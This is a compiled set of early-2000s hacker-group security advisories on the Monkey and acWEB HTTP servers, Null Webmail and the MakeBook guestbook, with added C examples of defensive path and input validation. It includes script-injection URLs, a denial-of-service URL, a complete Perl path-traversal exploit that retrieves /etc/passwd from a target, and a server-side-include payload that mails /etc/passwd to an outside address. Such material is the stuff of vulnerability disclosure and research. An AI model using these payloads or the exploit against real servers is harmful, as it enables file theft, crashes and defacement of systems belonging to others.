XSS bug in Monkey (0.5.0) HTTP server
[ Illegal Instruction Labs Advisory ]

Advisory name:      XSS bug in Monkey (0.5.0) HTTP server
Advisory number:    14
Application:        Monkey (0.5.0) HTTP server
Application author: Eduardo Silva (EdsipeR)
Author e-mail:      [EMAIL PROTECTED]
Monkey Project:     http://monkeyd.sourceforge.net
Date:               29.09.2002
Impact:             XSS code execution
Tested on:          Debian 2.1 (2.0.36 kernel)
Discovered by:      DownBload
Mail me @:          [EMAIL PROTECTED]

==[ Overview

Monkey is a very simple and fast HTTP server (daemon).

==[ Problems

1.) Monkey is vulnerable to XSS.

---cut here---
www.victim.com/<script>alert('IIL_0wnZ_YoU!!!');</script>
---cut here---

2.) There is also an XSS bug in the test2.pl CGI script (an example script) which comes with Monkey 0.5.0.

---cut here---
www.victim.com/cgi-bin/test2.pl?<script>alert('IIL_0wnZ_YoU!!!');</script>
---cut here---

==[ Greetz

Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org (NetZero Paradox). I'm very sorry if I forgot someone.
IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server
[ Illegal Instruction Labs Advisory ]

Advisory name:      Reverse traversal vulnerability in Monkey (0.1.4) HTTP server
Advisory number:    12
Application:        Monkey (0.1.4) HTTP server
Application author: Eduardo Silva (EdsipeR)
Author e-mail:      [EMAIL PROTECTED]
Monkey Project:     http://monkeyd.sourceforge.net
Date:               06.09.2002
Impact:             Attacker can read files outside the SERVER_ROOT directory
Tested on:          Debian 2.1 (2.0.36 kernel)
Discovered by:      DownBload
Mail me @:          [EMAIL PROTECTED]

==[ Overview

Monkey is a very simple and fast HTTP server (daemon). Monkey supports the HEAD & GET methods, multiple connections, and 100 MIME types.

==[ Problem

Monkey doesn't check the HTTP request for the "../" string, and because of that an attacker can view any file outside the SERVER_ROOT directory which Monkey can read (if Monkey is running under the root account, the attacker can read any file on that machine). There is still one thing which makes the attack a little more complicated:

- src/method.c

...
if((strcmp(aux_request,"/"))==0 || aux_request[1]=='.' ) {
    snprintf(filename,255,"%s",SERVER_ROOT);
}
...

Translated to (poor:) English: if our request is "/" or the second char of our request is ".", then the path will be set to SERVER_ROOT, and in that case we can't go out of the SERVER_ROOT directory.

The previous if will prevent a simple reverse traversal attack like this one:

---cut here---
GET /../../../../../../../../../etc/passwd HTTP/1.0
---cut here---

But it can't prevent this reverse traversal attack:

---cut here---
GET //../../../../../../../../../etc/passwd HTTP/1.0
---cut here---

==[ Exploit

---cut here---
#!/usr/bin/perl
#
# (0 day;) Monkey-0.1.4 reverse traversal exploit
#
# Usage:
#   perl monkey.pl hostname httpport file
#
#   hostname - target host
#   httpport - port on which HTTP daemon is listening
#   file     - file which you wanna get
#
# Example:
#   perl monkey.pl www.ii-labs.org 80 /etc/passwd
#
# by DownBload [EMAIL PROTECTED]
# Illegal Instruction Labs
#

use IO::Socket;

sub sock () {
    $SOCK = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp")
        || die "[ ERROR: Can't connect to $host!!! ]\n\n";
}

sub banner() {
    print "[--]\n";
    print "[ Monkey-0.1.4 reverse traversal exploit ]\n";
    print "[ by DownBload downbload\@hotmail.com ]\n";
    print "[ Illegal Instruction Labs ]\n";
    print "[--]\n";
}

if ($#ARGV != 2) {
    banner();
    print "[ Usage: ]\n";
    print "[ perl monkey.pl hostname httpport file ]\n";
    print "[--]\n";
    exit(0);
}

$host = $ARGV[0];
$port = $ARGV[1];
$file = $ARGV[2];

banner();
print "[ Connecting to $host... ]\n";
sock();
print "[ Sending probe... ]\n";
print $SOCK "HEAD / HTTP/1.0\n\n";
while ($a = <$SOCK>) { $line = $line . $a; }
if ($line =~ /Monkey/) {
    print "[ Monkey HTTP server found, continuing... ]\n";
} else {
    die "[ SORRY: That's not Monkey HTTP server :( ]\n\n";
}
close($SOCK);

print "[ Connecting to $host... ]\n";
sock();
print "[ Sending GET request... ]\n";
print $SOCK "GET //../../../../../../../../../$file HTTP/1.0\n\n";
print "[ Waiting for response... ]\n\n";
while ($line = <$SOCK>) { print $line; }
close($SOCK);
---cut here---

==[ Greetz

Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org (NetZero Paradox).
I'm very sorry if I forgot someone.
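The check quoted from src/method.c inspects only aux_request[1], which is exactly why a request starting with "//" slips past it. As an added example that is not Monkey's code, the C below reproduces that check and places beside it a segment-wise resolver that collapses repeated slashes, drops "." segments and refuses any ".." segment before prefixing an assumed SERVER_ROOT of /var/www (the function names and that root are assumptions for illustration):

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define SERVER_ROOT "/var/www"   /* assumed document root, for illustration */

/* Reproduces the check quoted from src/method.c. Returns true when the request
   is forced back to SERVER_ROOT (traversal blocked), false when it passes. */
bool monkey_check_blocks(const char *aux_request)
{
    return strcmp(aux_request, "/") == 0 || aux_request[1] == '.';
}

/* Canonicalises the request path segment by segment: repeated slashes are
   collapsed, "." segments dropped, and any ".." segment is refused outright, so
   the joined result can never leave SERVER_ROOT. Returns false on refusal. */
bool resolve_under_root(const char *req, char *out, size_t outlen)
{
    char rel[256] = "";
    const char *p = req;
    out[0] = '\0';
    while (*p) {
        while (*p == '/') p++;                  /* swallow "/" and "//" alike */
        if (!*p) break;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t n = (size_t)(p - seg);
        if (n == 2 && seg[0] == '.' && seg[1] == '.') return false;
        if (n == 1 && seg[0] == '.') continue;
        if (strlen(rel) + n + 2 > sizeof rel) return false;   /* no room */
        strcat(rel, "/");
        strncat(rel, seg, n);
    }
    snprintf(out, outlen, "%s%s", SERVER_ROOT, rel);
    return true;
}
```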
IIL Advisory: Format String bug in Null Webmail (0.6.3)
[ Illegal Instruction Labs Advisory ]

Advisory name:   Format String bug in Null Webmail (0.6.3)
Advisory number: 7
Application:     Null Webmail 0.6.3
Author:          Dan Cahill
E-mail:          [EMAIL PROTECTED]
Homepage:        http://www.nulllogic.com/webmail/
Date:            1.07.2002
Impact:          I don't know (yet)
Tested on:       nowhere
Discovered by:   DownBload
Mail me @:       [EMAIL PROTECTED]

==[ Overview

Null Webmail is a CGI interface to an SMTP & POP3 server (you can read and send mail with your browser). It is written in C. You can find Null Webmail on sourceforge.

==[ Problem

Null Webmail has a format string bug in logdata() and wmprintf(), but logdata() is inside /* */, so logdata() isn't interesting to us. Here comes the buggy code:

---[ wmserver.c

...
/*
void logdata(const char *format, ...)   /* --- NOT INTERESTING */
{
    char logbuffer[1024];
    char file[200];
    va_list ap;
    FILE *fp;

#ifdef WIN32
    snprintf(file, sizeof(file)-1, "C:\\webmail.log");
#else
    snprintf(file, sizeof(file)-1, "/tmp/webmail.log");
#endif
    fp=fopen(file, "a");
    if (fp!=NULL) {
        va_start(ap, format);
        vsnprintf(logbuffer, sizeof(logbuffer)-1, format, ap);
        va_end(ap);
        fprintf(fp, "%s", logbuffer);
        fclose(fp);
    }
}
*/

int wmprintf(const char *format, ...)   /* --- INTERESTING FUNCTION */
{
    char buffer[1024];
    va_list ap;

    va_start(ap, format);
    vsnprintf(buffer, sizeof(buffer)-1, format, ap);   // <- INTERESTING
    va_end(ap);
    send(wmsocket, buffer, strlen(buffer), 0);
//  logdata("%s", buffer);
    return 0;
}
...

---[ wmprintf() calls

...
wmprintf("USER %s\r\n", wmusername);
...
wmprintf("PASS %s\r\n", wmpassword);
...
wmprintf("MAIL From: %s\r\n", ptemp);
...
wmprintf("RCPT To: %s\r\n", msgaddr);
...
wmprintf("From: %s\r\n", wmaddress);
wmprintf("To: %s\r\n", msgto);
...
wmprintf("Subject: %s\r\n", msgsubject);
...
etc.

Here we have a few wmprintf() calls, and I think that we can put our 'NASTY %sTRING' in all those variables :).

==[ Example

Can't test this bug!!! If I'm wrong about this format string bug in Null Webmail, I'm very sorry.

==[ Greetz

Greetz goes to #hr.hackers & #linux irc.carnet.hr. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, Fr1c, phreax, harlequin, LekaMan, Astral and www.active-security.org (NetZero Paradox).
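As an added example, not Null Webmail's code, the C below mirrors the quoted wmprintf() (copying into a buffer instead of send()ing on wmsocket) to show what decides whether that vsnprintf sink is reachable: the calls listed above pass the user-controlled value as a %s argument, where its '%' bytes are copied verbatim, whereas passing the value as the format itself lets vsnprintf interpret it. The function names are assumptions; a small audit helper for spotting conversion specifiers in untrusted input is included.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Mirrors the quoted wmprintf(): a variadic wrapper whose `format` goes
   straight to vsnprintf. The send() on wmsocket is replaced by a copy into
   `out` so the result can be inspected offline. */
static int wmprintf_to(char *out, size_t outlen, const char *format, ...)
{
    char buffer[1024];
    va_list ap;
    va_start(ap, format);
    vsnprintf(buffer, sizeof(buffer) - 1, format, ap);
    va_end(ap);
    buffer[sizeof(buffer) - 1] = '\0';
    snprintf(out, outlen, "%s", buffer);
    return (int)strlen(out);
}

/* Shape of the calls quoted in the advisory: a fixed format literal with the
   user-controlled value as a %s argument. vsnprintf copies the argument
   verbatim, so any '%' it contains is never interpreted. */
int user_line_as_argument(char *out, size_t outlen, const char *wmusername)
{
    return wmprintf_to(out, outlen, "USER %s\r\n", wmusername);
}

/* The pattern that makes such a sink exploitable: untrusted data used as the
   format itself, so vsnprintf interprets its conversions. Shown here with the
   harmless "%%" escape only, which consumes no argument. Declaring the wrapper
   with __attribute__((format(printf, 3, 4))) lets gcc -Wformat-security flag
   this call at compile time. */
int user_line_as_format(char *out, size_t outlen, const char *wmusername)
{
    return wmprintf_to(out, outlen, wmusername);
}

/* Audit helper: does untrusted data carry a conversion specifier, i.e. a '%'
   that is not the literal escape "%%"? Returns 1 if so, else 0. */
int contains_conversion(const char *s)
{
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        return 1;
    }
    return 0;
}
```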
IIL Advisory: Vulnerabilities in acWEB HTTP server
[ Illegal Instruction Labs Advisory ]

Advisory name:   Vulnerabilities in acWEB HTTP server
Advisory number: 13
Application:     acWEB HTTP server
Author e-mail:   [EMAIL PROTECTED]
Homepage:        somewhere on sourceforge
Date:            10.09.2002
Impact:          DoS, XSS, etc.
Tested on:       Windows 98
Discovered by:   DownBload
Mail me @:       [EMAIL PROTECTED]

==[ Overview

Sourceforge: acWEB is an OpenSource replacement for MS IIS and other proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by viruses like CodeRed, Nimda, etc :).

/ME says: acWEB is a simple HTTP server for Windows. It is perfect for tiny companies, and for home use.

==[ Problem(s)

===[ Remote DoS

The first vulnerability which I discovered in the acWEB HTTP server was a remote DoS. It is possible to crash acWEB (and Windows too) with a simple HTTP request:

---cut here---
http://www.victim.com/com2.bat
---cut here---

===[ XSS a.k.a. CSS bug

XSS code execution:

---cut here---
http://www.victim.com/%db<script>alert('Illegal%20Instruction%20Labs%200wnz%20YoU!!!');</script>/
---cut here---

===[ Fake file download

---cut here---
http://www.victim.com/|%5chacked.txt%00
---cut here---

When this request is sent to the acWEB HTTP server, acWEB will return:

---
HTTP/1.0 200 OK
Content-Length: 0
Connection: Close
Content-Type: application/octet-stream
Server: Eserv/3.x
---

That is fuqn weird, because the file 'hacked.txt' doesn't exist. The acWEB HTTP server will send us an empty 'hacked.txt' file to download.

==[ Exploit

This can be exploited with a browser, so I won't write an exploit for this... or maybe one day :).

==[ Greetz

Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org (NetZero Paradox). I'm very sorry if I forgot someone.
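As an added example, not acWEB's code, the C below is the request-path validation a Windows-hosted server needs against the three requests above: it percent-decodes the path and rejects an embedded NUL (the %00 in the fake-download request), rejects characters Windows forbids in file names (the '|' and the encoded backslash), and refuses reserved DOS device names such as com2 whatever the extension (the com2.bat crash). The function names are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decodes `path` into `out`. Fails on a malformed escape or on an
   embedded NUL, which would silently truncate the name in C string APIs. */
static bool percent_decode(const char *path, char *out, size_t outlen)
{
    size_t o = 0;
    for (size_t i = 0; path[i]; i++) {
        int c = (unsigned char)path[i];
        if (c == '%') {
            if (!isxdigit((unsigned char)path[i + 1]) || !isxdigit((unsigned char)path[i + 2])) return false;
            char hex[3] = { path[i + 1], path[i + 2], '\0' };
            c = (int)strtol(hex, NULL, 16);
            i += 2;
        }
        if (c == 0 || o + 1 >= outlen) return false;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return true;
}

/* True if the last segment, with any extension stripped, is a reserved DOS
   device name (CON, PRN, AUX, NUL, COM1-9, LPT1-9); "com2.bat" still opens COM2. */
static bool is_reserved_device(const char *decoded)
{
    const char *slash = strrchr(decoded, '/');
    const char *base = slash ? slash + 1 : decoded;
    size_t n = strcspn(base, ".");
    char stem[8];
    if (n == 0 || n >= sizeof stem) return false;
    for (size_t i = 0; i < n; i++) stem[i] = (char)toupper((unsigned char)base[i]);
    stem[n] = '\0';
    if (!strcmp(stem, "CON") || !strcmp(stem, "PRN") || !strcmp(stem, "AUX") || !strcmp(stem, "NUL"))
        return true;
    return n == 4 && (!strncmp(stem, "COM", 3) || !strncmp(stem, "LPT", 3)) &&
           stem[3] >= '1' && stem[3] <= '9';
}

/* Accepts a path only if it decodes cleanly, has no character Windows forbids in file names, and names no device. */
bool request_path_is_safe(const char *path)
{
    char decoded[512];
    if (!percent_decode(path, decoded, sizeof decoded)) return false;
    if (strpbrk(decoded, "|\\:<>\"*?")) return false;
    return !is_reserved_device(decoded);
}
```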
SSI CSS execution in MakeBook 2.2
[ DownBload Security Research Lab Advisory ]

Advisory name:      SSI CSS execution in MakeBook 2.2
Advisory number:    5
Application:        MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris
Source:             http://www.tesol.net/scriptmail.html
Date:               12.6.2002
Impact:             remote user can execute shell commands & cross site scripting
Tested on:          Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by:      DownBload
Mail me @:          [EMAIL PROTECTED]

--[ Overview

...MakeBook v2.2 is a simple program which can be used as a guestbook, an ongoing writing project where each person adds to an ongoing story, a comment board, or even a way to let people add comments to many individual pages. It allows a user to enter their name, email address, and some text which will then be added to the bookfile. Originally intended for use in writing a continuing story or journal, where different students could add to the story as they went along, it has evolved into a more flexible system which allows the owner to choose how the book entries should appear, and even what pages they appear on...

--[ Problem

Our dear Kristina wrote an advanced CGI guestbook, in Perl of course. It works fine, but trouble comes when you look for security measures in the program. When you want to sign the guestbook, you have to write your name, email address, and some text. The script does remove 'some' special chars in $text, but it doesn't replace special chars in $name at all, and because of that it is possible to enter and execute some SSI (Server Side Includes) or CSS (Cross Site Scripting) code instead of a name.

'Buggy' code:

...
$name  = $data{Name};
$email = $data{Email};
$text  = $data{Text};
$text  =~ s/</&lt;/g;
$text  =~ s/>/&gt;/g;
...

--[ Examples

SSI attack
~~~~~~~~~~
Name:   <!--#exec cmd="/bin/mail [EMAIL PROTECTED] < /etc/passwd"-->
E-mail: [EMAIL PROTECTED]
Text:   I hacked you, my kung-fu is the best... ;)

CSS attack
~~~~~~~~~~
Name:   <img src="javascript:alert('HACKED BY DOWNBLOAD');">
E-mail: [EMAIL PROTECTED]
Text:   I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).

BTW: the SSI attack depends on the web server, because some web servers come with, and some without, support for SSI.

--[ Solution

The solution for this bug would be to filter special characters from user input. For now, you can use this:

...
$name  = $data{Name};
$name  =~ s/</&lt;/g;
$name  =~ s/>/&gt;/g;
$email = $data{Email};
$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;
$text  = $data{Text};
$text  =~ s/</&lt;/g;
$text  =~ s/>/&gt;/g;
...

--[ Greetz

Greetz goes to #hr.hackers irc.carnet.hr. Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, h4z4rd, fi, Fr1c, harlequin and www.active-security.org.